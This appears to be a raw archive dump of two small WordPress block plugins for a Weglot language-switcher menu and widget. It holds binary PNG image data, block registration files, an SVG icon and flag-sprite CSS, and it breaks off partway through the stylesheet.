��4�6��'�1`Z8�M>0�13ޜ����k�����]�����ڋ1`ʿ~G�[�+u��Na�L��6�C�p��	�c�1`��R�ř���p�;:D��h��޽{7��0���wo�M����d�@��}�����K{_:p�@O���8y��ez��I0�:�'4�{N�p�p`�I�R�r8��/��u��>bH_��t3D�S�8�͡����9��XZI����k(�6���LK*�A'��o_���R|9����\�JLqO��y�}�>�Ӗ�k����;,��0E&_�J���$Li��
@����
�@�� �L�Om�DӶ+��YW�T`*��}i�x�A�S��TW��,27��PQZh��@]��������"�-B`�4�ԉ�X�$�S��Rӽ��N�4_���'�{�&_2`
�K�	Lϒ1�/
�����
v�0=&W+���,���i�	b[y��L��(?���Ls#���$L�mKi`:<�޾��ئ�p;��gMhY�Ӳ��JcaS�l��qշ�E�e����v”���'0u����5:����#�.逩�����?�C���y�w�;T����v&�� F$_Ȕw��L[����
��6f�0��V��c���X{{�����0����߇+?�r=�N2��Y�3�wF*=�z`ݺK���
k��N��4z��H��ӯ�!l�C�����L"`�1�0
-���//r�%���J��x`
|�>^�S�E��@p�7�W����J�>�Bh7�K-`(�O���)��3I���R����r�x,I����[X�L�n�ݝ��_~�����O��/���'�<}![	0�|�w�+�*�ڡ�8������`�9��>�Gm�T`kP�5��3Cx��S��R������+}������]�]`���lT`JNaJ���~~��D�1C4'
��|%5ֶ��"|����^�C��)�>h�~����$��)�/M&0�.��?ly�<W<{|���(�2�R�;��o7��<���L?��-w����3:	�p��ڏc;�=�?V�)S���	���`�7U�vHL_��E�����'`ZI��D��v���>�hH����W}��,�A��jhꭃ0[�%�>��_������}�� ?0�kL�Հ㷦|F`ڌX�̈롻�'X=�I�iܗR��DaJ��ӄ��s��1�焌�7���rRSXó���K����<��J��i}���Z!��p�������DS&^��]^�ѥ�#�\gĘ���#uf�=�#
�ݭ"�_�����1�&y��_�2uMNh�LC˗}�{���!F����b-BS��;Fx��];γg0�8K��M0�9v�f�1��a��ҲiS-����fO�M{�����{�=p�;0�X'0u���u��`�3��3x����R��çsc�)��)])Ý��)S�R�;�t	�4}�Ǘ�Co2�/}�0��;_����%�`�Utݒ�nB`���i?��6h��l���jp�_S0����vX���S&�S&aJ;u���/�����|�SC�s�5�DS���'=�)���5���u���:L$0i��e�c�9�\Yi����(�tF���z%�|e*0]���Z&��l_�hޕ�B�RE��%���h#�K
LG�!s���]
��,��3�3FGRJ�p�`?1��[�H�47�7��y��co�i�S���(a�M��R���pZ�EK�#;0
����ͻ�-�o|)�~h�ܰӪ*`j�R��	���V�
L�m��6��������?g�[�J�֭s���s��Y"��E�2bj�m���'K��baiOa|)^~��N��{T�01���l�o�'��
���ᬥk*+3�i��k\��iA��-/�CE^	���Ro����T�v|����"~�-���L��6�
L?�G�N��*0E[wO�'}C0������?nj����r��ٳ`T�pݞdӉL����� ���It����3�&2/34����ӂ��C��Ç���5w�'��k�#�-��^����_�_��{�;�<N{.�+L��(w��)��R�F[�
<�ӟ<
��]0�cd��觧.���	�b�h՚o���^�<�9�2�_ᄌ5M핕�y�&���nq�����y�M�\`��-��L!|iR�)��ן<����?��)�2�R�ݴ+��o]b�Q�\��t�nθ����ᇇ�"[�ü�z���T�{�E�^`Z�П���9����O�sh��~
�]��j��>
Ojude��O8���`���w�n�����=X���g�L������˻��'�ݚ���p���)�/�Sʗ��~��kN�a��=>
ӟ���J��$�
��44_�L�pYj2U�]B:�i]]��*md[�$��
L�y)�b��sAb�
��Vҙ	҈7tb��_�K��
)�:���??xp���'�K0��9z/-��Ƿ���>�+�����s����F�i�A�1q������Ð�%Q���[��d����h���B�)X�r���, I���.8})��B����ͦ���I|O��ۗ�Xҗ��|uzS����u�L��ń�%���C�/M0}�[��<�ӳ̾T80%S�(0e�t�9��ʙ3gV��˯{>�	1H�Ɨ�K~B�:0�CEӐ/Ք�|)o�5�XL�N�ab��nCa|�P�A���I�Nn_����b��R�.0ݷ����3Հi!��{�OJ+�С��Lk5�����
�Zi�)�Ko�$0�!d̡�/%��DӕY=�0=���Y�ףS�0���)��@x�ۂ�9�-�%��cnҗ��	?_I��+j6W��/fr^KiY�i!�iT���ֲvЫJ��6��rdz������4�D5f�=�[�/p��V0]�su'!���/�����~�\A�����Tr�ܼ:���f���\��ʗ�����V�C8"��s��|�]�f�a�y�N��=����d�4�+m�V"�ww(�0�P�6"��@���4:\�EXK��DY�������Lc��S.^�S�E�zCp�?<囚tkXϯP\ �z��zs&B#�|K�jK;���Z�}�P`z�RL��$E�Z�ot�x^LME�F�0�o�i�l�w?���
[��7t_�ū��ךct|���a���礍=Eu�"����g��3l��4��#�o~��l�S��}m0->'���SR|����\�6�����إPEg��ld87��W؊�lE���j�L��v��P�D�t{*S_�T`�]�~}V�Γw�O@���b�R�������L%`��~�7M���}��`����3`��^�/0�ͥeq`ZXj.�\e���II����ա#o����G�B[6�%���$�LI�N`zr����G�?�n??0-���_��y|h���mF,o0���?�'X!t�.߰G7ϖ��d��4a��%L0�kA��y�D_�L+���K�
K���S0��L�U�����z*��L�x)����/��W:/_��$��W�[- �\KK�#��93�]`�wԕww6 �'��;��}����%�`�֘�L9�0�t����
���[�o�[V��w��]6`�W�	��^��c�(���R�����ͦ>p�����?���7�<�j�k���N?`j�q�R���pЙ"�t��e�L��-[2�X�{]0�@�0�S�c�܊u��[��M����l��Q�O�T��Z����K�D`��	S1�T����e���J7KT~�/݂�K�:�5]�x�
C�4�t��L]ߗ��4nr��^؛�q��?>�aX��
��M���4ސ�B�REӂ؆���]�h`��v�R�*�f�_/�ƄiԗjȀo���`+��$�47���fp!���#�T�}o�����
[e^�f�Jˢvtm+KC�!�1���7[k�5��ڭ�a�#m��0)�Ĕ^�uXLKC,0ų�6��A���zď	LG��r�R���/ at�����e���S�!ۓ������2yM��}N��P�>�'���K�3���R���ǂ�*0E]p�i*-m"��642y��ro�W�7�Ө/��/]��1���&����\�WT�y�X��^ď�E��@��Z9�a���r�x,�$E���nd��h`���nANAAx�!��g
ASR����Ưo��xo������������!��ջ^wҁ)��zM>�>�`(�q���������FgEj�ӕ�ي�h�'��M�m���Z�T�42�B���Slvi���'82M0E���R�Cr��*0%�?s�?M\�s��� ��4r%\}D~�JrRh��͓d/=����f\���E����/���������e`�����3u���A�R���q|��H�I�)�/�
S�a?b�?�a��?}i��Д,����J�J4�iN��q��Wd��)��L�yiv�=�ޭ��6Ĥ뻣�+�
�S]M��uvm[�/�g�պ1IP2��Ŝ>�)�m��7C�'��;!�Ԫsm��іK:��ryf`:��7�}i)p�uUu
7o6�C70��ބS��eq9���՗�L��m6�!�/��<�K���6��7_�v����KLE�N��1�(`��n:ɘ�{��_��/%S�C�o��*�t(c�'�
L�Lɾ�L#Ƅ�8`*}P|�[ȝ0��w�o',���w��:|��R�j�w��A
������2<�����})��o$���T��tOlGF��]�&��:a���UL�"�^0՜�̒i�)oHLAӷv�ܾ�om�!N:0��9�h`�� Mc��f�"��Im7�q�jm$_�
~�2�9Tf`��x���1$1��{a��m�9mJ��!�?�s�p�4�Eӹ�>�@ߪ�@Lu�,u��:���=u�nO�N��;�^%2�S�2��W&�~�Y���	�/LGb��=��K��]�b��4&����7�|O80���O?����G���;�z]��CZ��Z�'��Y��/€�AJ)iK�/���S��x����G�[��޻w?͉%�}����'�46B�tb*��G�T_�S|�v�a�����y'�������TaU�v+�lZG�/��[�8��D�;��6�{��5��#9;F�/��M'`
�K�L�p� w�'�`�����
LLk�/����9�=yg6���+��c]�ƺ#y�5��l���U�.`
�X���?8�z��w>f�
6��D�\�s/MP~�f��}TH�K���D�-^i�)�/�S�����y=͗f��&�lE]E���2��yq�M��/t`��KqVg/o���p�wwv^��'�3�}����{�>��R#��{��3�S��B�[�;!�Tg9۳���sI�����0�G�c/�����b Nk
�.ko�UA��×RL�\ׄ�$�R}�/��ӗr�A�Tc(�1�*0�����&W}�����^E�4�`J}b���ϧ0�g��T�i��)ŗR�)A�6�+
�R|iu��<�bX��V��F`z�w�1v������K9`�U}���Ái�~�wN�(��>e*��Sh_�D`��ӗ2�҄S���0������,��SCD$YI�Ru����tƔ
LK�6�kN4�pPVG>�q���ZM�6�	�6Y&L�g�KR�X>��ɡ�@�6�<��:��t���ib�K��>��t5��.�������`}�.|�~���J�Kz�)�3��x"SA�D_*�ގ���_� Q���T�^a`H��r@�Kh����T�2�ۡt���C.^��@����K��c�Bb�%-�	���G���[S�����<�������86L�; S��=�0��R������a�b.XB������Uu�k�:��{~r�#��NԼ��9�y�����]��B}ijSH_�d`��6��祘T��SN_J~X�	���g��u
/]��6�������<��'ӂ4.�c�#��N!`z�ٺÇ����ɑ��=��s>.��{��<>�X�
��8G�y��[�.ʗj���� �iGx���ӗ��)jp1��zd��C��t!�r:�V^޴9oA6`�Tx��
L�y):��N\y�
���_�%�
^ߗ���~'����9v#��g"SNo�L�ݔ���W€�=y����1z��SN_JyX0��	�T�Ku��
��iL�(2/��4i��fN���4_J���!���L+#�.'���Ke�rG�Ӹ/��R*0�S��-z$_����_���_�ڌ�I�t�����g�S/��v�����t���B^"��t�]��(��R���_+&�/eӥ���`hC^az8���A�/L�$�5�|{�
L%�`�i���3����6��|q�4���t��d3�/]DŽ6e�[Y�������G�b�i	b�0EmO#��yG���0�OA����t���$��e�����7�?A���v�/%�*0w�O�.�Y�nZ��!_
�KU`*0��(��t�L�B�i%��ǢKZ�N4�'A�Fn%�F"V�*�n�Ⱦ��Db*��G�t_�Ӱ�1�p�g��N}`�A��4|�Hw2}O{S�T�NI�rr��ׯ��+!0ݮt`
�K�
L�ڍ��#q�C0��'��4a���?0x�\>yt��/���Z\.`ZYXXF�����&�i��^U[W[e/�`7�$��u�n��s)�t���?{6�y>��ztw�ܸ᷇�4�s�w��?oF,oY��=�Q^ʞ!���})I��vQ�g��:����ϗ"Sۉۉ�.��\�tc��
���R��j(�l�#�Z;����T0�0�|Š1tcZ�#M�)��[z.�e0������R
�B�R����ד�`��K�OLy|)�	���\z�i������:0�9�\`J��d`J~T#����	��F�g�B��Li��L��Ti���NA�R��m(���RmL�x=�/��0�N���AL��aA�4�L�X�@�
�3�ͣc�K9tiB3����\I\���Me`����T,0-�Y�M�v��L�Si'8d�x�R_)cZ�%������ޜ�Z�����Z�Ra��W��Tl}�S&`:7�ؘ>�����_��'�D���:��~��,���K�ǧqJp��Ec{�_p��T�'��|��喀��s�s$/U��,��T��!���\�B��AJiK�U�D
�}�h�VҀ)�����}T`
$��T�� L|�
L�(��?���
�����4{Ӕ�`���zQ�43�B���S-�%p������&�b|?����쥣��?�^+0u}�20�����,�'��6~||��CK#���C3����Wߜ°��_�b����x����e!��R�R��NS��R ��R�0U*0}.!��ח"SS�	sQ���|��$0�$��B���4;���>�:RUig[�ㆰ.m����P2��q{�����5��V9�����w��i�����ѹ�P�)�7`�/�0��ya�����kt�*��R�SЁ)�/%=ї��ö���(�iL
�[�T��S��Pn`��K)����f��'ES��c��R�J��i��)͗ҁ)A���)��ڱG|ts�d��M�)W�0ն̹����
�nS_�@`��7���/�֥	���0�437���9�_*��KC����R��L���y6���9<9	��fg��	L��^G�{�ˣ�4�S�SS�iL��ѐ$ͨ�>�~ط���?A�����9��E����ߥ0m��x��a�n�n���/�����"�
L����.yld��R!����uIJ�in�띛�(JL���S�����Ƅ)�/U�i,lX�3�w���S�ڐ�Y�Ӝ��I�M+`
�KL8Ё)�/%<I�	�ڎ���W�Z��*0��:��g�8��;|���s���X���wϝ��͈�-�|�ėֆT^g@,0u�R�0U*0�Ma*�/En_�n���m���[e2ӧb�/x`
�K��u6��ɒ[/��ŤT�v��Va���[M}�<�[ZS��;!������@�\�J�i����å`
�K���B�R�}��������505�[�P�ijS��b�/�S�0�mG�>�\`Z��X�*�&��艹�K�iD�V�OS,0���
C ����
*0�%1��۽'�Z�~y�S$_�<`z_��/�ե	����S�j��/
Lc��T`��t6�q�|��<����|��K��<c�:U�ij�B����ց��`z@H��tꗆ�h��rЩ�u� �R����0	S�ʱ�צ�8Bį7��$�B���wM��T��4��]F������T0�) ��E�Ġ�SS�@���*Q_H0��]���F�)s��؈��ҟi�Nw`:͚�4���m����0E�*0�_��qa���S��#���f0���J|;L��8'��w�.>�����X����e!��$9�"��S�=+
��ʗƅ�b��sr���})r�R2_���ظ0]8_"0ݘ)0������D���WL;&S����e�NX�Ȕ�C�t`��KS����=J�P�� LQ�)�/%<
ї���X=�qO���	LU`�b����2�R0%S�4����&���c��T`�t`J��L�� L�
L!})�԰{�
��G��W�ԚY-¿8�)�/U0��
�/�ѥ��aa�����,e{�Li�Ӵ���b��w��g1�(�z\�Y&�ЦL`�
(�
�
{?ީ�o�d0�'�=�g��~9_D�ї
�|�4�6P��,8�}I�-�j�|�</U���Թ�MDF�t"S�����6]2�vB��&�Z���!b*I��,M�
L#Q���?�Uv�S<��

��
0Y�^ߓ+50ݮd`��KU`���4&LU`����v9$�Y��b�T��t�ٳݙ����#ܗNM��͈�-�|�Ɨj�U�bZ�(`
�Kc�T��2��̾�}Y�.뚿uk��6� 0�$����`
�K�^4����C6���i�N0�:B��au��w�q	5�M}`���3�Z�F�22��Ҹ0E�p�4^�}i�<��I_����"�
L���|)�ƅ)�>��<�`�>i;�qH�*�&�⾴)�K�)�0U0=��T���N�N_�
L��T���Tq���c�K!u�€iH�Ku`j���Q��
L�����:��pҗ���՛�4`J^}���^�����a�2����\z�}B��$c���?A�€��z�b��L۬V֛�[���K�y�
L��[2/��L���Kс�1J1�R�B��*��H40�T�^��l�@��4]Ml���l��)L�W'0]��)җ�ZS$_�S����Qa��UL��T��t`��ܽFT����e!��R�RmmCg����`
�K��T���99����})�7T�wu���e�Oŝ�0�����>5~�9P���!�� `j1�W�:��L��)L�^^0�,V����Q0��bmL�'��2����0V]_�������[*0Mo`J���4&L��ڟL��Cr.P��4��L��4"L�
�#���j)rF��O�*0��~o�00
����R�S L��805K�ި�T�����N��P�끭��S����L�
L���My�����w��\~NKS?sӃP�UX���T�-���~^�SɁ���62ӵ�gT`�S@.�
L%�rS���o�-Q}�*����z�1�����Y��ǹ�iL�|�
L���|iD���T��LE�ϛ�b�W�|����z�S8_���p)Le����K�t��]����erӍ���~`��K�o�4�1���v�q�.�cDO��,�6���Щ���d��Y�t+̙�U805Ü�f�җ���᝚n�J(�i�-��*0M60�Z�Y€)ŗ2Ө0EkM�*�;�ɺ@���S�/e�l�T�ޗj+���_�S4�J�*0%�~o�20���aQ�yr�����f�����u#R���tӓ�m��ǡ�qld�ɼ`�Z>�D���+ӫ�t�`�?�WК������sZ����DبX�)L'����JL�[�g�
L��-�5W��?|��AJ�hK�Ҁ�U±���)k�g�Kb��5���E��B�DSw5=�6��N[�U`
bzz�S�4��)�/U�)��/M�0U��
LW0E��T{O�5����)�/
S��B��>�/En_�
]����F9��&��0E㥲����y�s�
���ߡ�7�m�K�/VHL�#b(
��1D�L%ӭp��V���w*�	�_X_���#�㝂�s��lܺT����!�R})#0�S�����]ЫIEND�B`�weglot-menu/build/images/wgarrowdown.517eb92e.png000064400000000244151330373270015607 0ustar00�PNG


IHDR&ӥ�kIDATx�c`�X��@̆C^��q6I �	�]@̄E>	��q66͌@l��x*3#��Aœ	9_�?�|��@��È��?�@�	��H
@
 �Į��0��h��IEND�B`�weglot-menu/build/block.json000064400000000723151330373270012101 0ustar00{
  "$schema": "https://schemas.wp.org/trunk/block.json",
  "apiVersion": 2,
  "name": "create-block/weglot-menu",
  "version": "0.1.0",
  "title": "Weglot Widget menu",
  "category": "widgets",
  "parent": ["core/navigation"],
  "icon": "smiley",
  "description": "Weglot switcher menu",
  "supports": {
	"html": true
  },
  "textdomain": "weglot-menu",
  "editorScript": "file:./index.js",
  "editorStyle": "file:./index.css",
  "style": "file:./style-index.css"
}
weglot-menu/build/index.js000064400000010461151330373270011561 0ustar00!function(){"use strict";var L={n:function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return L.d(t,{a:t}),t},d:function(e,t){for(var n in t)L.o(t,n)&&!L.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},o:function(L,e){return Object.prototype.hasOwnProperty.call(L,e)}},e=window.wp.blocks,t=window.wp.element;const n={};n.weglot=(0,t.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,t.createElement)("path",{d:"M12.9831 0.0472697L13.4682 0.0945448L13.9462 0.164576L14.4172 0.250364L14.8829 0.355413L15.3417 0.477971L15.7916 0.618033L16.2346 0.775604L16.6706 0.950685L17.0961 1.14152L17.5146 1.34811L17.9208 1.56872L18.32 1.80508L18.7087 2.05719L19.0851 2.32331L19.4528 2.60344L19.803 2.89758L20.1532 3.20397L20.4859 3.52261L20.8046 3.85352L21.111 4.20368L21.4051 4.55384L21.6853 4.9215L21.9514 5.29793L22.2018 5.68661L22.4399 6.08404L22.6605 6.49197L22.8672 6.90867L23.0563 7.33586L23.2314 7.77006L23.3872 8.21302L23.529 8.66472L23.6516 9.12168L23.7566 9.5874L23.8424 10.0601L23.9107 10.5381L23.9597 11.0213L23.9895 11.5115L24 12.0053L23.9895 12.5007L23.9597 12.9892L23.9107 13.4724L23.8424 13.9521L23.7566 14.4231L23.6516 14.8888L23.529 15.3458L23.3872 15.7975L23.2314 16.2404L23.0563 16.6764L22.8672 17.1018L22.6605 17.5185L22.4399 17.9265L22.2018 18.3256L21.9514 18.7126L21.6853 19.089L21.4051 19.4567L21.111 19.8068L20.8046 20.157L20.4859 20.4896L20.1532 20.8083L19.803 21.1147L19.4528 21.4071L19.0851 21.6872L18.7087 21.9533L18.32 22.2037L17.9208 22.44L17.5146 22.6624L17.0961 22.8637L16.6706 23.0546L16.2346 23.2296L15.7916 23.3872L15.3417 23.5273L14.8829 23.6498L14.4172 23.7549L13.9462 23.8424L13.4682 23.9107L12.9831 23.9597L12.4946 23.9895L11.9991 24L11.5054 23.9895L11.0151 23.9597L10.5318 23.9142L10.0538 23.8459L9.58109 23.7584L9.1171 23.6533L8.65835 23.5308L8.20311 23.389L7.75837 23.2314L7.32415 23.0563L6.90392 22.8637L6.48545 22.6589L6.07748 22.4365L5.68002 22.2002L5.29306 21.9498L4.91486 21.6819L4.54717 21.4018L4.19698 21.1094L3.84679 20.803L3.51412 20.4844L3.19545 20.1517L2.88904 19.8016L2.59488 19.4514L2.31473 19.0837L2.04859 18.7056L1.79821 18.3186L1.56183 17.9195L1.33946 17.5115L1.13285 17.0948L0.943754 16.6694L0.768661 16.2334L0.612826 15.7905L0.472753 15.3388L0.348439 14.8818L0.243382 14.4161L0.157583 13.9451L0.0892992 13.4654L0.0402733 12.9822L0.0105052 12.4937L0 11.9983L0.0105052 11.5045L0.0402733 11.0143L0.0892992 10.5311L0.157583 10.0531L0.243382 9.58039L0.348439 9.11468L0.472753 8.65772L0.612826 8.20601L0.768661 7.76306L0.943754 7.32886L1.13285 6.90166L1.33946 6.48497L1.56183 6.07703L1.79821 5.6796L2.04859 5.29093L2.31473 4.9145L2.59488 4.54683L2.88904 4.19667L3.19545 3.84651L3.51412 3.51561L3.84679 3.19697L4.19698 2.89058L4.54717 2.59644L4.91486 2.31631L5.29306 2.05019L5.68002 1.79807L6.07748 1.56171L6.48545 1.34112L6.90392 1.13452L7.3294 0.94368L7.76363 0.7686L8.20836 0.611028L8.65835 0.470966L9.1171 0.348408L9.58109 0.243359L10.0538 0.157571L10.5318 0.0875401L11.0151 0.0402704L11.5054 0.00875188L11.9991 0L12.4946 0.00875188L12.9831 0.0472697Z",fill:"#18164C"}),(0,t.createElement)("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M13.1629 9.00676C14.0613 8.08877 15.1601 7.64917 16.4463 7.64917C17.6781 7.65415 18.8591 8.14147 19.7361 9.00676L18.424 10.3191C17.8617 9.77606 17.2089 9.49808 16.4592 9.49808C15.7171 9.48861 15.004 9.78563 14.4879 10.3191C13.945 10.8686 13.6735 11.528 13.6735 12.2908C13.6616 13.0323 13.9563 13.7457 14.4879 14.2626C15.1252 14.9082 16.0385 15.2003 16.9321 15.0442C17.8257 14.8881 18.5861 14.3038 18.967 13.4803H16.3558V11.7284H21.0546C21.2285 13.1474 20.7371 14.5672 19.7232 15.5749C18.8118 16.48 17.7131 16.939 16.4398 16.939C15.2057 16.9581 14.019 16.4641 13.1629 15.5749C12.2895 14.7137 11.8376 13.6744 11.8015 12.4513L9.9843 17.0943L8.26446 12.529L6.58987 17.0943L2.91095 7.71111H4.89589L6.58987 12.0563L8.29032 7.71111L9.9843 12.0563L11.6718 7.71111H13.6568L13.1415 9.02764C13.1486 9.02066 13.1557 9.0137 13.1629 9.00676Z",fill:"white"}));var o=n,r=(window.wp.i18n,window.wp.blockEditor),l=window.wp.serverSideRender,i=L.n(l);(0,e.registerBlockType)("create-block/weglot-menu",{icon:o.weglot,edit:function(L){const e=(0,r.useBlockProps)();return(0,t.createElement)("div",e,(0,t.createElement)(i(),{block:"create-block/weglot-widget",attributes:L.attributes}))},save:function(){return null}})}();weglot-menu/build/index.asset.php000064400000000257151330373270013054 0ustar00<?php return array('dependencies' => array('wp-block-editor', 'wp-blocks', 'wp-element', 'wp-i18n', 'wp-server-side-render'), 'version' => 'c32346d2d7f9ab48d67c439f11567927');weglot-widget/weglot-widget.php000064400000001635151330373270012632 0ustar00<?php
/**
 * Plugin Name:       Weglot Widget
 * Description:       Example block written with ESNext standard and JSX support – build step required.
 * Requires at least: 5.8
 * Requires PHP:      7.0
 * Version:           0.1.0
 * Author:            The WordPress Contributors
 * License:           GPL-2.0-or-later
 * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain:       weglot-widget
 *
 * @package           create-block
 */

/**
 * Registers the block using the metadata loaded from the `block.json` file.
 * Behind the scenes, it registers also all assets so they can be enqueued
 * through the block editor in the corresponding context.
 *
 * @see https://developer.wordpress.org/reference/functions/register_block_type/
 */
function create_block_weglot_widget_block_init() {
	register_block_type( __DIR__ . '/build' );
}
add_action( 'init', 'create_block_weglot_widget_block_init' );
weglot-widget/src/save.js000064400000001511151330373270011413 0ustar00/**
 * Retrieves the translation of text.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-i18n/
 */
import { __ } from '@wordpress/i18n';

/**
 * React hook that is used to mark the block wrapper element.
 * It provides all the necessary props like the class name.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-block-editor/#useBlockProps
 */
import { useBlockProps } from '@wordpress/block-editor';

/**
 * The save function defines the way in which the different attributes should
 * be combined into the final markup, which is then serialized by the block
 * editor into `post_content`.
 *
 * @see https://developer.wordpress.org/block-editor/developers/block-api/block-edit-save/#save
 *
 * @return {WPElement} Element to render.
 */
export default function save() {
	return null;
}
weglot-widget/src/icons.js000064400000007124151330373270011576 0ustar00const icons = {};

icons.weglot = <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
	<path d="M12.9831 0.0472697L13.4682 0.0945448L13.9462 0.164576L14.4172 0.250364L14.8829 0.355413L15.3417 0.477971L15.7916 0.618033L16.2346 0.775604L16.6706 0.950685L17.0961 1.14152L17.5146 1.34811L17.9208 1.56872L18.32 1.80508L18.7087 2.05719L19.0851 2.32331L19.4528 2.60344L19.803 2.89758L20.1532 3.20397L20.4859 3.52261L20.8046 3.85352L21.111 4.20368L21.4051 4.55384L21.6853 4.9215L21.9514 5.29793L22.2018 5.68661L22.4399 6.08404L22.6605 6.49197L22.8672 6.90867L23.0563 7.33586L23.2314 7.77006L23.3872 8.21302L23.529 8.66472L23.6516 9.12168L23.7566 9.5874L23.8424 10.0601L23.9107 10.5381L23.9597 11.0213L23.9895 11.5115L24 12.0053L23.9895 12.5007L23.9597 12.9892L23.9107 13.4724L23.8424 13.9521L23.7566 14.4231L23.6516 14.8888L23.529 15.3458L23.3872 15.7975L23.2314 16.2404L23.0563 16.6764L22.8672 17.1018L22.6605 17.5185L22.4399 17.9265L22.2018 18.3256L21.9514 18.7126L21.6853 19.089L21.4051 19.4567L21.111 19.8068L20.8046 20.157L20.4859 20.4896L20.1532 20.8083L19.803 21.1147L19.4528 21.4071L19.0851 21.6872L18.7087 21.9533L18.32 22.2037L17.9208 22.44L17.5146 22.6624L17.0961 22.8637L16.6706 23.0546L16.2346 23.2296L15.7916 23.3872L15.3417 23.5273L14.8829 23.6498L14.4172 23.7549L13.9462 23.8424L13.4682 23.9107L12.9831 23.9597L12.4946 23.9895L11.9991 24L11.5054 23.9895L11.0151 23.9597L10.5318 23.9142L10.0538 23.8459L9.58109 23.7584L9.1171 23.6533L8.65835 23.5308L8.20311 23.389L7.75837 23.2314L7.32415 23.0563L6.90392 22.8637L6.48545 22.6589L6.07748 22.4365L5.68002 22.2002L5.29306 21.9498L4.91486 21.6819L4.54717 21.4018L4.19698 21.1094L3.84679 20.803L3.51412 20.4844L3.19545 20.1517L2.88904 19.8016L2.59488 19.4514L2.31473 19.0837L2.04859 18.7056L1.79821 18.3186L1.56183 17.9195L1.33946 17.5115L1.13285 17.0948L0.943754 16.6694L0.768661 16.2334L0.612826 15.7905L0.472753 15.3388L0.348439 14.8818L0.243382 14.4161L0.157583 13.9451L0.0892992 13.4654L0.0402733 12.9822L0.0105052 12.4937L0 11.9983L0.0105052 11.5045L0.0402733 11.0143L0.0892992 10.5311L0.157583 10.0531L0.243382 9.58039L0.348439 9.11468L0.472753 8.65772L0.612826 8.20601L0.768661 7.76306L0.943754 7.32886L1.13285 6.90166L1.33946 6.48497L1.56183 6.07703L1.79821 5.6796L2.04859 5.29093L2.31473 4.9145L2.59488 4.54683L2.88904 4.19667L3.19545 3.84651L3.51412 3.51561L3.84679 3.19697L4.19698 2.89058L4.54717 2.59644L4.91486 2.31631L5.29306 2.05019L5.68002 1.79807L6.07748 1.56171L6.48545 1.34112L6.90392 1.13452L7.3294 0.94368L7.76363 0.7686L8.20836 0.611028L8.65835 0.470966L9.1171 0.348408L9.58109 0.243359L10.0538 0.157571L10.5318 0.0875401L11.0151 0.0402704L11.5054 0.00875188L11.9991 0L12.4946 0.00875188L12.9831 0.0472697Z" fill="#18164C"/>
	<path fill-rule="evenodd" clip-rule="evenodd" d="M13.1629 9.00676C14.0613 8.08877 15.1601 7.64917 16.4463 7.64917C17.6781 7.65415 18.8591 8.14147 19.7361 9.00676L18.424 10.3191C17.8617 9.77606 17.2089 9.49808 16.4592 9.49808C15.7171 9.48861 15.004 9.78563 14.4879 10.3191C13.945 10.8686 13.6735 11.528 13.6735 12.2908C13.6616 13.0323 13.9563 13.7457 14.4879 14.2626C15.1252 14.9082 16.0385 15.2003 16.9321 15.0442C17.8257 14.8881 18.5861 14.3038 18.967 13.4803H16.3558V11.7284H21.0546C21.2285 13.1474 20.7371 14.5672 19.7232 15.5749C18.8118 16.48 17.7131 16.939 16.4398 16.939C15.2057 16.9581 14.019 16.4641 13.1629 15.5749C12.2895 14.7137 11.8376 13.6744 11.8015 12.4513L9.9843 17.0943L8.26446 12.529L6.58987 17.0943L2.91095 7.71111H4.89589L6.58987 12.0563L8.29032 7.71111L9.9843 12.0563L11.6718 7.71111H13.6568L13.1415 9.02764C13.1486 9.02066 13.1557 9.0137 13.1629 9.00676Z" fill="white"/>
</svg>

export default icons;
weglot-widget/src/editor.scss000064400000150606151330373270012314 0ustar00/**
 * The following styles get applied inside the editor only.
 *
 * Replace them with your own styles or remove the file completely.
 */

.weglot-flags.hw>a:before,.weglot-flags.hw>span:before{background-position:-3570px 0 !important}.weglot-flags.af>a:before,.weglot-flags.af>span:before{background-position:-6570px 0 !important}.weglot-flags.fl>a:before,.weglot-flags.fl>span:before{background-position:-3060px 0 !important}.weglot-flags.sq>a:before,.weglot-flags.sq>span:before{background-position:-2580px 0 !important}.weglot-flags.am>a:before,.weglot-flags.am>span:before{background-position:-5130px 0 !important}.weglot-flags.ar>a:before,.weglot-flags.ar>span:before{background-position:-510px 0 !important}.weglot-flags.hy>a:before,.weglot-flags.hy>span:before{background-position:-1800px 0 !important}.weglot-flags.az>a:before,.weglot-flags.az>span:before{background-position:-6840px 0 !important}.weglot-flags.ba>a:before,.weglot-flags.ba>span:before{background-position:-2040px 0 !important}.weglot-flags.eu>a:before,.weglot-flags.eu>span:before{background-position:-7260px 0 !important}.weglot-flags.be>a:before,.weglot-flags.be>span:before{background-position:-5310px 0 !important}.weglot-flags.bn>a:before,.weglot-flags.bn>span:before{background-position:-5400px 0 !important}.weglot-flags.bs>a:before,.weglot-flags.bs>span:before{background-position:-6390px 0 !important}.weglot-flags.bg>a:before,.weglot-flags.bg>span:before{background-position:-2730px 0 !important}.weglot-flags.br>a:before,.weglot-flags.br>span:before{background-position:-6630px 0 !important}.weglot-flags.my>a:before,.weglot-flags.my>span:before{background-position:-3299px 0 !important}.weglot-flags.ca>a:before,.weglot-flags.ca>span:before{background-position:-7230px 0 !important}.weglot-flags.zh>a:before,.weglot-flags.zh>span:before{background-position:-3690px 0 !important}.weglot-flags.tw>a:before,.weglot-flags.tw>span:before{background-position:-2970px 0 !important}.weglot-flags.km>a:before,.weglot-flags.km>span:before{background-position:-6930px 0 !important}.weglot-flags.ny>a:before,.weglot-flags.ny>span:before{background-position:-1140px 0 !important}.weglot-flags.co>a:before,.weglot-flags.co>span:before{background-position:-2520px 0 !important}.weglot-flags.hr>a:before,.weglot-flags.hr>span:before{background-position:-5910px 0 !important}.weglot-flags.cs>a:before,.weglot-flags.cs>span:before{background-position:-2700px 0 !important}.weglot-flags.da>a:before,.weglot-flags.da>span:before{background-position:-2670px 0 !important}.weglot-flags.nl>a:before,.weglot-flags.nl>span:before{background-position:-2100px 0 !important}.weglot-flags.en>a:before,.weglot-flags.en>span:before{background-position:-1920px 0 !important}.weglot-flags.eo>a:before,.weglot-flags.eo>span:before{background-position:-1920px 0 